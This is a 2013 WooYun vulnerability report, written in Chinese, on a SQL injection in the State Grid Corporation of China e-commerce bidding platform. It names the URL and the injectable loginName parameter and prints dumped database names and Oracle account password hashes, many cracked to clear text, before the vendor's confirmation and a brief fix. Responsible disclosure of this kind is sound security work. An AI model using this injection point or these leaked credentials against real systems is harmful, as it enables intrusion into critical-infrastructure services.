当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027695

漏洞标题:国家电网公司某重要平台SQL注射漏洞

相关厂商:国家电网公司

漏洞作者: z@cx

提交时间:2013-07-04 16:09

修复时间:2013-08-18 16:10

公开时间:2013-08-18 16:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-04: 细节已通知厂商并且等待厂商处理中
2013-07-04: 厂商已经确认,细节仅向厂商公开
2013-07-14: 细节向核心白帽子及相关领域专家公开
2013-07-24: 细节向普通白帽子公开
2013-08-03: 细节向实习白帽子公开
2013-08-18: 细节向公众公开

简要描述:

国家电网公司某重要平台SQL注射漏洞

详细说明:

出现问题的是国家电网公司电子商务平台,涉及在线电子投标等重要业务
POST SQL注射

https://ecp.sgcc.com.cn/BidUpgrade/SgccRecyclersModify?next=2
POST DATA:password=12345678&loginName=12345678

漏洞证明:

available databases [25]:
[*] APEX_030200
[*] APPQOSSYS
[*] B
[*] BIDPRO2
[*] BUYER
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] GOLDENGATE
[*] MDSY
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PATROL
[*] SOURCING
[*] STAR1
[*] STAR2
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


database management system users password hashes:
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] APEX_030200 [1]:
    password hash: F7599A99C9DEFCF6
[*] APEX_PUBLIC_USER [1]:
    password hash: A07104683C8DC6AA
[*] APPQOSSYS [1]:
    password hash: 519D632B7EE7F63A
    clear-text password: APPQOSSYS
[*] BIDPRO [1]:
    password hash: 41A99F61848947D0
[*] BIDPRO2 [1]:
    password hash: 4B8100F8ED7A9857
    clear-text password: BIDPRO2
[*] BUYER [1]:
    password hash: F15C947644911B1E
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
    clear-text password: CHANGE_ON_INSTALL
[*] DBSNMP [1]:
    password hash: FFF45BB2C0C327EC
    clear-text password: ORACLE
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
    clear-text password: DIP
[*] ECPBIUSER [1]:
    password hash: 14780BE41C64DB20
    clear-text password: ECPBIUSER
[*] EXFSYS [1]:
    password hash: 33C758A8E388D
[*] FLOWS_FILES [1]:
    password hash: 01AE0330AF78EA86
[*] GOLDENGATE [1]:
    password hash: 3D349C58F9250ABB
    clear-text password: GOLDENGATE
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
    clear-text password: MDDATA
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
    clear-text password: MDSYS
[*] MGMT_VIEW [1]:
    password hash: F1D1680A130E
[*] OLAPSYS [1]:
    password hash: 4AC23CC3B15E2208
[*] ORACLE_OCM [1]:
    password hash: 5A2E026A9157958C
[*] ORDDATA [1]:
    password hash: A93EC937FCD1DC2A
    clear-text password: ORDDATA
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
    clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
    clear-text password: ORDSYS
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
    clear-text password: OUTLN
[*] OWBSYS [1]:
    password hash: 610A3C38F301776F
    clear-text password: OWBSYS
[*] OWBSYS_AUDIT [1]:
    password hash: FD8C3D14F6B60015
    clear-text password: OWBSYS_AUDIT
[*] PATROL [1]:
    password hash: 0478B8F047DECC65
    clear-text password: PATROL
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
    clear-text password: SI_INFORMTN_SCHEMA
[*] SOURCING [1]:
    password hash: FB6C020D46C50754
[*] SPATIAL_CSW_ADMIN_USR [1]:
    password hash: 1B290858DD14107E
    clear-text password: SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR [1]:
    password hash: 7117215D6BEE6E82
    clear-text password: SPATIAL_WFS_ADMIN_USR
[*] STAR1 [1]:
    password hash: 4D8450ECC8B577DD
[*] STAR2 [1]:
    password hash: EEE6ACF7DA046F54
[*] SYS [1]:
    password hash: DCB748A5BC5390F2
    clear-text password: PASSWORD
[*] SYSMAN [1]:
    password hash: 2
[*] SYSTEM [1]:
    password hash: 2D594E86
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
    clear-text password: WMSYS
[*] XDB [1]:
    password hash: 8
[*] XS$NULL [1]:
    password hash: DC4FCC8CB69A6733

修复方案:

过滤参数loginName

版权声明:转载请注明来源 z@cx@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-07-04 16:23

厂商回复:

谢谢,尽快整改。

最新状态:

暂无

漏洞评价:

评论